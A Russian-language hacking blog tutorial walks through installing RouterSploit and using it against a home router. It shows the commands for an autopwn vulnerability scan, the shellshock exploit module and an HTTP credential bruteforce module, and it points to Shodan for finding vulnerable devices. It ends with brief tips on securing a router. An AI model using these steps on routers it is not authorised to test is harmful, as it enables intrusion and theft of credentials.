Hacking
October 9, 2021

RouterSploit. Взлом сети

Всем салют, дорогие друзья!
В этой статье вы узнаете о уязвимостях маршрутизаторов (роутеров). Мы рассмотрим интересный инструмент - RouterSploit. Этот инструмент создан по образцу Metasploit, но в отличии от первого, специализируется на взломе маршрутизаторов.

Давайте начнем!


Технические требования:

  • Python
  • Доступ к интернету
  • Навыки работы с терминалом
  • Kali Linux

1. Установка RouterSploit

Чтобы установить routersploit в Kali Linux, откройте терминал и введите следующие команды в том же порядке, что и ниже:

apt-get install python3-pip
git clone https://www.github.com/threat9/routersploit
cd routersploit
python3 -m pip install -r requirements.txt
python3 rsf.py

2. Запуск RouterSploit

Для запуска routersploit требуется перейти в директорию этого инструмента и выполнить следующее:

python3 rsf.py

Если вы хотите увидеть все возможные эксплойты, просто введите следующее:

show all

Теперь давайте начнем со сканирования маршрутизатора и выяснения, есть ли в нем какие-либо уязвимости.

3. Cканирование цели

Чтобы просканировать маршрутизатор на предмет всех возможных эксплойтов, мы будем использовать модуль сканера Autopwn, чтобы найти любые уязвимости, которые влияют на наш целевой маршрутизатор. Но сначала вам нужно найти IP-адрес целевого маршрутизатора. Я буду показывать на примере своего.

По умолчанию многие маршрутизаторы используют 192.168.0.1. или 192.168.1.1. И для сканирования цели нужно ввести следующее:

use scanners/auto pawn
show options

В нашем случае мы установим цель на IP-адрес маршрутизатора 192.168.0.1. Введите «set target», затем IP-адрес маршрутизатора, после клавишу enter. Затем, введите run, чтобы начать сканирование.

set target 192.168.0.1
run

4. Выбор и настройка эксплойта маршрутизатора

После завершения сканирования мы увидим все уязвимости, влияющие на маршрутизатор.

Начнем с простого эксплойта. Воспользуемся эксплойтом shellshock; введем следующие команды.

use exploits/generic/shellshock
show options

Вы сможете установить цель, набрав:

set target <target router IP>

5. Запуск эксплойта

Вы можете выполнить полезную нагрузку, набрав run .

Если эксплойт будет успешным, вас встретят внутренние параметры конфигурации и пароли, а также имена пользователей, которые можно использовать для взлома и управления маршрутизатором.

Эти эксплойты могут привести к утечке логина и пароля пользователей, паролей по умолчанию (например, admin), серийных номеров устройств и т.д.

Например, если вы хотите подобрать и взломать имя пользователя и пароль маршрутизатора, введите следующие команды:

use creds/http_basic_bruteforce
rsf (HTTP Basic Bruteforce) > show options
set target 192.168.0.2
run

В Shodan можно найти массу уязвимых устройств, к которым без особых проблем можно получить доступ:


Как обезопасить себя от взлома роутера?

Большинство людей настраивают роутеры один раз в жизни и полностью о них забывают. Они не могут изменить настройки маршрутизаторов по умолчанию, даже образованные сетевые администраторы не склонны это делать (из-за лени).

Но вы можете сделать следующее:

  • Обновите прошивку роутера
  • Отключить пин-WPS
  • Включить безопасность wpa2
  • Выбирайте надежные пароли
  • Остановить трансляцию SSID
  • Используйте фильтры MAC

Спасибо за внимание!

Да, хочу!


Напоминаем, что у нас есть и другие проекты, которые могут быть вам интересны: